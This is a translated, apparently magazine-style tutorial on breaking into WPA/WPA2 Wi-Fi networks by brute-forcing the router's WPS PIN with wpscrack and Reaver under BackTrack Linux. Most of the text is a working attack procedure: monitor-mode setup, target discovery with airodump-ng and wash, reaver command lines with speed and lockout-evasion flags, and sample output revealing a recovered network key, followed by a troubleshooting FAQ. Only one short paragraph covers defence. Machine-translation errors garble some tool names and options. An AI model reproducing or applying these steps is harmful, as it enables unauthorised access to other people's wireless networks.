Prva implementacija grube sile koja se pojavila bio je uslužni program wpscrack (goo.gl/9wABj), koji je napisao istraživač Stefan Viböck u Pythonu. Uslužni program je koristio biblioteku Scapy, koja vam omogućava da ubacite proizvoljne mrežne pakete. Skripta se može pokrenuti samo pod Linux sistemom, nakon prvog prebacivanja bežičnog sučelja u nadzorni mod. Kao parametre morate navesti naziv mrežnog interfejsa u sistemu, MAC adresu bežičnog adaptera, kao i MAC adresu pristupne tačke i njen naziv (SSID).

$ ./wpscrack.py --iface mon0 --client 94:0c:6d:88:00:00 --bssid f4:ec:38:cf:00:00 --ssid testap -v njuškalo je počelo pokušavati 00000000 pokušaj 0,95 sekundi pokušavam 00010009<...>pokušaj 18660005 pokušaj je trajao 1,08 sekundi pokušaj 18670004# pronađeno 1. polovina pokušaja PIN-a je trajalo 1,09 sekundi pokušaj 18670011 pokušaj je trajao 1,08 sekundi<...>pokušavam 18674095# pronašao 2. polovinu PIN-a<...>Mrežni ključ: 0000 72 65 61 6C 6C 79 5F 72 65 61 6C 6C 79 5F 6C 6F stvarno_stvarno_lo 0010 6E 67 5F 77 70 61 5F 70 61 70 70 70 70 70 5 5F 67 6F 6F 64 6F 6C 75 63 6B 5F 63 72 61 63 e_good_luck_crac 0030 6B 69 6E 67 5F 74 68 69 73 5F 6F 6E 65king_this_one<...>

Kao što vidite, prvo je odabrana prva polovina PIN koda, zatim druga, da bi na kraju program proizveo gotov ključ za povezivanje na bežičnu mrežu. Teško je zamisliti koliko bi vremena trebalo da se pronađe ključ ove dužine (61 znak) sa već postojećim alatima. Međutim, wpscrack nije jedini uslužni program za iskorištavanje ranjivosti, a ovo je prilično smiješan trenutak: u isto vrijeme, drugi istraživač, Craig Heffner iz Tactical Network Solutions, radio je na istom problemu. Vidjevši da se na internetu pojavio radni PoC za implementaciju napada, objavio je svoj Reaver uslužni program. On ne samo da automatizuje proces odabira WPS-PIN-a i ekstrahovanja PSK ključa, već nudi i veći broj podešavanja tako da se napad može izvesti protiv širokog spektra rutera. Osim toga, podržava mnogo veći broj bežičnih adaptera. Odlučili smo to uzeti kao osnovu i detaljno opisati kako napadač može koristiti ranjivost u WPS protokolu za povezivanje na sigurnu bežičnu mrežu.

KAKO

Kao i kod svakog drugog napada na bežičnu mrežu, trebat će nam Linux. Ovdje se mora reći da je Reaver prisutan u repozitoriju poznate distribucije BackTrack, koja također već uključuje potrebne drajvere za bežične uređaje. Stoga ćemo ga tačno koristiti.

Korak 0. Pripremite sistem

Na službenoj web stranici BackTrack 5 R1 dostupan je za preuzimanje kao virtuelna mašina pod VMware-om i za pokretanje ISO slika. Preporučujem poslednju opciju. Možete jednostavno zapisati sliku na disk ili pomoću programa napraviti fleš disk za pokretanje: na ovaj ili onaj način, nakon pokretanja sa takvog medija, odmah ćemo imati sistem spreman za rad bez ikakvih nepotrebnih problema.

Ubrzani kurs o hakiranju Wi-Fi mreže

  1. WEP (Wired Equivalent Privacy) Prva tehnologija za zaštitu bežične mreže pokazala se izuzetno slabom. Možete ga hakovati bukvalno za nekoliko minuta, koristeći slabosti RC4 šifre koja se koristi u njemu. Glavni alati ovdje su airodump-ng sniffer za prikupljanje paketa i aircrack-ng uslužni program, koji se koristi direktno za razbijanje ključa. Postoji i poseban alat wesside-ng, koji generalno automatski hakuje sve obližnje WEP tačke.
  2. WPA/WPA2 (bežični zaštićeni pristup)

Brute force je jedini način da se pronađe ključ za zatvorenu WPA/WPA2 mrežu (pa čak i tada samo ako postoji dump tzv. WPA rukovanja, koji se emituje kada se klijent poveže na pristupnu tačku).

Gruba sila može se povući danima, mjesecima i godinama. Da bi se povećala efikasnost pretraživanja, prvo su korišćeni specijalizovani rečnici, zatim su generisane dugine tabele, a kasnije su se pojavili uslužni programi koji su koristili NVIDIA CUDA i ATI Stream tehnologije za hardversko ubrzanje procesa pomoću GPU-a. Alati koji se koriste su aircrack-ng (brute sile pomoću rječnika), cowpatty (koristeći rainbow tablice), pyrit (koristeći video karticu).

Korak 1: Prijavite se

Podrazumevana prijava i lozinka su root:toor. Jednom u konzoli, možete bezbedno da pokrenete “X” (postoje odvojeni BackTrack sklopovi - i sa GNOME-om i sa KDE-om):

#startx

Korak 2: Instalirajte Reaver

Da preuzmemo Reaver, trebat će nam internet. Stoga povezujemo patch kabel ili konfiguriramo bežični adapter (meni "Aplikacije > Internet > Wicd Network Manager"). Zatim pokrećemo emulator terminala, gdje učitavamo najnovija verzija uslužni programi preko spremišta:

# apt-get update # apt-get install reaver

Ovdje moram reći da spremište sadrži verziju 1.3, koja meni lično nije radila kako treba. Nakon traženja informacija o problemu, pronašao sam post autora, koji preporučuje ažuriranje na najvišu moguću verziju kompajliranjem izvora preuzetih iz SVN-a. Ovo je, općenito, najuniverzalnija metoda instalacije (za bilo koju distribuciju).

$ svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps $ cd ./reaver-wps/src/ $ ./configure $ make # napravi instalaciju

Neće biti problema sa sastavljanjem pod BackTrack-om - lično sam proverio. U Arch Linux distribuciji koju koristim, instalacija je još jednostavnija, zahvaljujući prisutnosti odgovarajućeg PKGBUILD-a:

$ yaourt -S reaver-wps-svn

Korak 3. Priprema za grubu silu

Da biste koristili Reaver, morate učiniti sljedeće:

  • prebacite bežični adapter u način nadzora;
  • saznajte naziv bežičnog interfejsa;
  • saznati MAC adresu pristupne tačke (BSSID);
  • provjerite je li WPS aktiviran na tački.

Prvo, hajde da proverimo da li je bežični interfejs uopšte prisutan u sistemu:

#iwconfig

Ako izlaz ove komande sadrži interfejs sa opisom (obično wlan0), to znači da je sistem prepoznao adapter (ako se povezao na bežičnu mrežu da učita Reaver, onda je bolje da prekinete vezu). Stavimo adapter u nadzorni mod:

# airmon-ng start wlan0

Ova komanda kreira virtuelno sučelje u režimu nadgledanja, njegovo ime će biti naznačeno u izlazu komande (obično mon0). Sada moramo pronaći pristupnu tačku za napad i saznati njen BSSID. Koristimo uslužni program za slušanje bežičnih emisija airodump-ng:

#airodump-ngmon0

Na ekranu će se pojaviti lista pristupnih tačaka unutar dometa. Zanimaju nas tačke sa WPA/WPA2 enkripcijom i autentifikacijom PSK ključa.

Bolje je izabrati jednog od prvih na listi, jer je dobra komunikacija sa točkom poželjna za izvođenje napada. Ako ima puno tačaka i lista ne stane na ekran, onda možete koristiti još jedan dobro poznati uslužni program - kismet, gdje je sučelje prikladnije u tom pogledu. Opciono, možete provjeriti na licu mjesta da li je WPS mehanizam uključen u našem mjestu. Da biste to učinili, Reaver dolazi u paketu sa (ali samo ako ga preuzmete od SVN) uslužnim programom za pranje:

# ./wash -i mon0

Parametar je naziv sučelja prebačenog u nadzorni mod. Također možete koristiti opciju "-f" i uslužni program uneti cap datoteku koju je kreirao, na primjer, isti airodump-ng. Iz nekog nepoznatog razloga, Reaver paket u BackTrack-u nije uključivao uslužni program za pranje. Nadajmo se da će ova greška biti ispravljena do objavljivanja ovog članka.

Korak 4. Pokrenite grubu silu

Sada možete nastaviti direktno sa traženjem svog PIN-a. Da biste pokrenuli Reaver u najjednostavnijem slučaju, ne treba vam puno. Potrebno je samo da navedete naziv interfejsa (koji smo prethodno prebacili u režim nadgledanja) i BSSID pristupne tačke:

# reaver -i mon0 -b 00:21:29:74:67:50 -vv

Prekidač "-vv" omogućava poboljšani izlaz programa tako da možemo biti sigurni da sve radi kako treba.

Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner [+] Čeka se beacon od 00:21:29:74:67:50 [+] Povezano sa 00:21:29:74:67:50 (ESSID: linksys) [+] Pokušavam pin 63979978

Ako program konzistentno šalje PIN-ove pristupnoj tački, to znači da je sve dobro počelo i ostaje samo glupo čekati. Proces može potrajati dugo. Najkraće vrijeme u kojem sam mogao grubo forsirati PIN bilo je oko pet sati. Čim bude odabran, program će vas rado obavijestiti o tome:

[+] Pokušavam pin 64637129 [+] Ključ puknut za 13654 sekunde [+] WPS PIN: "64637129" [+] WPA PSK: "MyH0rseThink$YouStol3HisCarrot!" [+] AP SSID: "linksys"

Najvrednije ovdje je, naravno, WPA-PSK ključ, koji možete odmah koristiti za povezivanje. Sve je tako jednostavno da vam ne stane ni u glavu.


Da li je moguće odbraniti se?

Za sada postoji samo jedan način da se zaštitite od napada - onemogućite WPS u postavkama rutera. Međutim, kako se pokazalo, to nije uvijek moguće. Pošto ranjivost ne postoji na nivou implementacije, već na nivou protokola, ne treba očekivati ​​brzu zakrpu od proizvođača koja bi rešila sve probleme. Najviše što sada mogu učiniti je da se odupru gruboj sili koliko god je to moguće. Na primjer, ako blokirate WPS na jedan sat nakon pet neuspješnih pokušaja unosa PIN koda, pretraga će trajati oko 90 dana. Ali drugo pitanje je koliko brzo se takva zakrpa može postaviti na milione uređaja koji rade širom svijeta?

Upgrading Reaver

U HOWTO-u smo pokazali najlakši i najsvestraniji način korištenja uslužnog programa Reaver. Međutim, implementacija WPS-a različitih proizvođača je različit, pa je u nekim slučajevima potrebna dodatna konfiguracija. U nastavku ću dati dodatne opcije koje mogu povećati brzinu i efikasnost pretraživanja ključeva.

  1. Možete postaviti broj kanala i SSID pristupne tačke: # reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys
  2. Opcija "--dh-small" ima povoljan učinak na brzinu grube sile, koja postavlja malu vrijednost za tajni ključ, čime se olakšavaju proračuni na strani pristupne točke: # reaver -i mon0 -b 00:01:02 :03:04:05 -vv --dh-malo
  3. Podrazumevano vremensko ograničenje odgovora je pet sekundi. Ako je potrebno, možete ga promijeniti: # reaver -i mon0 -b 00:01:02:03:04:05 -t 2
  4. Podrazumevano kašnjenje između pokušaja je jedna sekunda. Također se može konfigurirati: # reaver -i mon0 -b 00:01:02:03:04:05 -d 0
  5. Neke pristupne tačke mogu blokirati uključenje WPS-a određeno vrijeme, sumnjajući da ih pokušavaju pojebati. Reaver primjećuje ovu situaciju i pauzira pretragu na 315 sekundi prema zadanim postavkama, trajanje ove pauze se može promijeniti: # reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250
  6. Neke implementacije WPS protokola će prekinuti vezu ako PIN kod nije tačan, iako bi prema specifikaciji trebalo da vrate posebnu poruku. Reaver automatski prepoznaje ovu situaciju, za to postoji opcija "--nack": # reaver -i mon0 -b 00:01:02:03:04:05 --nack
  7. Opcija "--eap-terminate" je namijenjena za rad s onim AP-ovima koji zahtijevaju prekid WPS sesije pomoću EAP FAIL poruke: # reaver -i mon0 -b 00:01:02:03:04:05 --eap -prekinuti
  8. Pojava grešaka u WPS sesiji može značiti da AP ograničava broj pokušaja unosa PIN koda ili je jednostavno preopterećen zahtjevima. Informacije o tome će biti prikazane na ekranu. U ovom slučaju, Reaver pauzira svoju aktivnost, a vrijeme pauze se može postaviti pomoću opcije "--fail-wait": # reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait =360

FAQ

Pitanje: Koji je bežični adapter potreban za hakovanje?

Odgovor: Prije eksperimentiranja, morate se uvjeriti da bežični adapter može raditi u nadzornom modu. Najbolji način- provjerite listu podržane opreme na web stranici projekta Aircrack-ng. Ako se postavi pitanje koji bežični modul kupiti, onda možete početi s bilo kojim adapterom baziranim na RTL8187L čipsetu. USB ključevi se lako mogu naći na internetu za 20 dolara.

Pitanje: Zašto dobijam greške "timeout" i "out of order"?

Odgovor: Ovo se obično dešava zbog slabe jačine signala i loše komunikacije sa pristupnom tačkom. Osim toga, pristupna tačka može privremeno blokirati korištenje WPS-a.

Pitanje: Zašto lažiranje MAC adrese ne radi za mene?

Odgovor: Možete lažirati MAC virtuelnog interfejsa mon0, a ovo neće raditi. Morate navesti ime stvarnog interfejsa, na primjer, wlan0.

Pitanje: Zašto Reaver radi loše kada je signal loš, iako isto WEP hakovanje radi dobro?

Odgovor: WEP pucanje se obično događa ponovnim prijenosom uhvaćenih paketa kako bi se dobilo više vektora inicijalizacije (IV) potrebnih za uspješan krak. U ovom slučaju nije bitno da li je neki paket izgubljen ili na neki način oštećen na putu. Ali da biste napali WPS, morate striktno slijediti protokol prijenosa paketa između pristupne točke i Reavera kako biste provjerili svaki PIN kod. A ako se u isto vrijeme neki paket izgubi ili stigne u nepristojnom obliku, tada ćete morati ponovo uspostaviti WPS sesiju. To čini napade na WPS mnogo više zavisnim od jačine signala. Takođe je važno zapamtiti da samo zato što vaš bežični adapter vidi pristupnu tačku, to ne znači da pristupna tačka vidi vas. Dakle, ako ste sretni vlasnik adaptera velike snage iz ALFA mreže i antene od nekoliko desetina dBi, onda nemojte očekivati ​​da ćete uspjeti razbiti sve uhvaćene pristupne točke.

Pitanje: Reaver uvijek šalje isti PIN pristupnoj tački, šta je bilo?

Odgovor: Provjerite da li je WPS aktiviran na ruteru. To se može učiniti pomoću uslužnog programa za pranje: pokrenite ga i provjerite je li vaša meta na listi.

Pitanje: Zašto se ne mogu povezati sa pristupnom tačkom?

Odgovor: Ovo može biti zbog slabe jačine signala ili zato što vaš adapter nije pogodan za takvo istraživanje.

Pitanje: Zašto stalno dobijam greške "otkriveno ograničenje brzine"? Odgovor: Ovo se dešava jer je pristupna tačka blokirala WPS. Obično je to privremena blokada (oko pet minuta), ali u nekim slučajevima mogu nametnuti trajnu zabranu (deblokiranje samo preko administrativnog panela). Postoji jedna neugodna greška u Reaver verziji 1.3, zbog koje uklanjanje takvih brava nije otkriveno. Kao zaobilazno rešenje, oni predlažu korišćenje opcije "--ignore-locks" ili preuzimanje najnovije verzije sa SVN-a.

Pitanje: Mogu li istovremeno pokrenuti dvije ili više instanci Reavera da bih ubrzao svoj napad?

Odgovor: Teoretski je moguće, ali ako kljucaju na istoj pristupnoj tački, malo je vjerovatno da će se brzina pretraživanja povećati, jer je u ovom slučaju ograničena slabim hardverom pristupne točke, koja je već u potpunosti učitana čak i s jednom napadač.